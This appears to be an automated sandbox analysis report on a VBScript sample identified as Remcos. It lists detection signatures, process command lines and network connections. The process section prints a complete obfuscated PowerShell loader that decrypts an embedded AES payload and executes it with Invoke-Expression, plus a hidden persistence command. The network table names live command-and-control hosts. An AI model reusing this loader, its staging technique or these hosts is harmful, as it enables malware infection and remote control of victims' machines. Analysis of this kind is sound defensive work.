Analysis Overview
SHA256
043ca2ac861326e01d02af9599b54c8a23b781dda3e9f3c31166885a1f67e401
Threat Level: Known bad
The file envifa.vbs was found to be: Known bad.
Malicious Activity Summary
Remcos
Blocklisted process makes network request
Drops startup file
Checks computer location settings
Suspicious use of SetThreadContext
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
Suspicious behavior: GetForegroundWindowSpam
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-12-05 18:38
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-12-05 18:38
Reported
2023-12-05 18:44
Platform
win7-20231023-en
Max time kernel
117s
Max time network
122s
Command Line
Signatures
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2720 wrote to memory of 2992 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2720 wrote to memory of 2992 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2720 wrote to memory of 2992 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\envifa.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function Decrypt-AESEncryption{Param([String]$CBGNKODNPÇ,[String]$Keygfhfghfgiy)$OGjnLfnOaç = New-Object System.Security.Cryptography.AesManaged;$OGjnLfnOaç.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OGjnLfnOaç.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$OGjnLfnOaç.BlockSize = 128;$OGjnLfnOaç.KeySize = 256;$OGjnLfnOaç.Key = (New-Object System.Security.Cryptography.SHA256Managed).ComputeHash([System.Text.Encoding]::UTF8.GetBytes($Keygfhfghfgiy));$BxwZvbgNLo = [System.Convert]::FromBase64String($CBGNKODNPÇ);$OGjnLfnOaç.IV = $BxwZvbgNLo[0..15];$decryptor = $OGjnLfnOaç.CreateDecryptor();$geLJgUoUQL = $decryptor.TransformFinalBlock($BxwZvbgNLo, 16, $BxwZvbgNLo.Length - 16);$OGjnLfnOaç.Dispose();return [System.Text.Encoding]::UTF8.GetString($geLJgUoUQL).Trim([char]0)}$qROuE = '58417081275505453806';$MqDDxKjJmA = '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';$GmtBWLkcKU = Decrypt-AESEncryption -CBGNKODNPÇ $MqDDxKjJmA -Key $qROuE;Invoke-Expression $GmtBWLkcKU
Network
Files
memory/2992-4-0x000007FEF4EB0000-0x000007FEF584D000-memory.dmp
memory/2992-7-0x0000000001E10000-0x0000000001E18000-memory.dmp
memory/2992-6-0x00000000024E0000-0x0000000002560000-memory.dmp
memory/2992-5-0x000000001B1A0000-0x000000001B482000-memory.dmp
memory/2992-8-0x000007FEF4EB0000-0x000007FEF584D000-memory.dmp
memory/2992-10-0x00000000024E0000-0x0000000002560000-memory.dmp
memory/2992-9-0x00000000024E0000-0x0000000002560000-memory.dmp
memory/2992-11-0x00000000024E0000-0x0000000002560000-memory.dmp
memory/2992-12-0x00000000024E0000-0x0000000002560000-memory.dmp
memory/2992-13-0x000007FEF4EB0000-0x000007FEF584D000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2023-12-05 18:38
Reported
2023-12-05 18:44
Platform
win10-20231025-en
Max time kernel
290s
Max time network
295s
Command Line
Signatures
Remcos
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2916 set thread context of 4172 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\envifa.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function Decrypt-AESEncryption{Param([String]$CBGNKODNPÇ,[String]$Keygfhfghfgiy)$OGjnLfnOaç = New-Object System.Security.Cryptography.AesManaged;$OGjnLfnOaç.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OGjnLfnOaç.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$OGjnLfnOaç.BlockSize = 128;$OGjnLfnOaç.KeySize = 256;$OGjnLfnOaç.Key = (New-Object System.Security.Cryptography.SHA256Managed).ComputeHash([System.Text.Encoding]::UTF8.GetBytes($Keygfhfghfgiy));$BxwZvbgNLo = [System.Convert]::FromBase64String($CBGNKODNPÇ);$OGjnLfnOaç.IV = $BxwZvbgNLo[0..15];$decryptor = $OGjnLfnOaç.CreateDecryptor();$geLJgUoUQL = $decryptor.TransformFinalBlock($BxwZvbgNLo, 16, $BxwZvbgNLo.Length - 16);$OGjnLfnOaç.Dispose();return [System.Text.Encoding]::UTF8.GetString($geLJgUoUQL).Trim([char]0)}$qROuE = '58417081275505453806';$MqDDxKjJmA = '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';$GmtBWLkcKU = Decrypt-AESEncryption -CBGNKODNPÇ $MqDDxKjJmA -Key $qROuE;Invoke-Expression $GmtBWLkcKU
C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\google.vbs
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | paste.ee | udp |
| US | 188.114.97.0:443 | paste.ee | tcp |
| US | 8.8.8.8:53 | 0.97.114.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | 233.133.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | remccoss2023.duckdns.org | udp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| US | 8.8.8.8:53 | 155.162.142.181.in-addr.arpa | udp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| US | 8.8.8.8:53 | remccoss2023.duckdns.org | udp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| US | 8.8.8.8:53 | 155.162.142.181.in-addr.arpa | udp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| US | 8.8.8.8:53 | 13.73.50.20.in-addr.arpa | udp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| US | 8.8.8.8:53 | remccoss2023.duckdns.org | udp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| US | 8.8.8.8:53 | 128.99.217.23.in-addr.arpa | udp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| US | 8.8.8.8:53 | remccoss2023.duckdns.org | udp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| US | 8.8.8.8:53 | remccoss2023.duckdns.org | udp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| US | 8.8.8.8:53 | remccoss2023.duckdns.org | udp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
